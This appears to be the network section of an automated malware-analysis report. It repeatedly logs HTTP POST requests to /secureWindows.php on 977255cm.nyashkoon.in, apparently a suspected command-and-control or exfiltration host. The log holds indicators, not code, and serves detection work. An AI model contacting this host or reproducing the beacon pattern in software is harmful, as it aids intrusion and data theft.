Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
